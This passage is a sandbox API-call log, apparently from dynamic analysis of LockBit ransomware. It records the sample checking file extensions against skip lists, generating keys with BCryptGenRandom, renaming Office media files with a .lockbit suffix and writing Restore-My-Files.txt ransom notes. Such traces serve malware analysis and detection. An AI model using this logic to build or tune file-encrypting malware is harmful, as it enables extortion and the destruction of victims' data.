(lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.455] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.455] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.455] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF.lockbit") returned 79 [0202.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18252_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.456] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.456] malloc (_Size=0x40068) returned 0x3df0008 [0202.456] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1878) returned 1 [0202.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.457] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.466] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.466] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.466] free (_Block=0x1fa2ed8) [0202.466] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.466] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.466] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb803b00, ftCreationTime.dwHighDateTime=0x1bdcf23, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb803b00, ftLastWriteTime.dwHighDateTime=0x1bdcf23, nFileSizeHigh=0x0, nFileSizeLow=0x6ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18253_.WMF", cAlternateFileName="")) returned 1 [0202.466] lstrcmpiW (lpString1=".", lpString2="BD18253_.WMF") returned -1 [0202.466] lstrcmpiW (lpString1="..", lpString2="BD18253_.WMF") returned -1 [0202.466] PathFindExtensionW (pszPath="BD18253_.WMF") returned=".WMF" [0202.466] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.466] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.467] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.467] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.468] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18253_.WMF") returned 1 [0202.468] lstrcmpiW (lpString1="ntldr", lpString2="BD18253_.WMF") returned 1 [0202.468] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18253_.WMF") returned 1 [0202.468] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18253_.WMF") returned 1 [0202.468] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18253_.WMF") returned -1 [0202.468] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18253_.WMF") returned 1 [0202.468] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18253_.WMF") returned 1 [0202.468] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF") returned=".WMF" [0202.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.469] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.469] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.470] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.470] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF.lockbit") returned 79 [0202.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18253_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.471] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.471] malloc (_Size=0x40068) returned 0x3df0008 [0202.471] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1708) returned 1 [0202.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.473] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.489] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.489] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.489] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.489] free (_Block=0x1fa2ed8) [0202.489] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.489] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.489] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bca4100, ftCreationTime.dwHighDateTime=0x1bddcab, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1bca4100, ftLastWriteTime.dwHighDateTime=0x1bddcab, nFileSizeHigh=0x0, nFileSizeLow=0x796, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18254_.WMF", cAlternateFileName="")) returned 1 [0202.489] lstrcmpiW (lpString1=".", lpString2="BD18254_.WMF") returned -1 [0202.489] lstrcmpiW (lpString1="..", lpString2="BD18254_.WMF") returned -1 [0202.489] PathFindExtensionW (pszPath="BD18254_.WMF") returned=".WMF" [0202.490] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.490] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.491] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18254_.WMF") returned 1 [0202.491] lstrcmpiW (lpString1="ntldr", lpString2="BD18254_.WMF") returned 1 [0202.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18254_.WMF") returned 1 [0202.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18254_.WMF") returned 1 [0202.491] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18254_.WMF") returned -1 [0202.492] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18254_.WMF") returned 1 [0202.492] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18254_.WMF") returned 1 [0202.492] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.492] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF") returned=".WMF" [0202.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.492] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.492] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.493] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.493] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.493] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.493] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.493] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF.lockbit") returned 79 [0202.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18254_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.495] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.495] malloc (_Size=0x40068) returned 0x3df0008 [0202.496] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1942) returned 1 [0202.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.497] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.502] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.502] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.502] free (_Block=0x1fa2ed8) [0202.502] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.502] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.502] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55feb900, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x55feb900, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, nFileSizeLow=0x822, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18255_.WMF", cAlternateFileName="")) returned 1 [0202.502] lstrcmpiW (lpString1=".", lpString2="BD18255_.WMF") returned -1 [0202.502] lstrcmpiW (lpString1="..", lpString2="BD18255_.WMF") returned -1 [0202.502] PathFindExtensionW (pszPath="BD18255_.WMF") returned=".WMF" [0202.502] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.502] 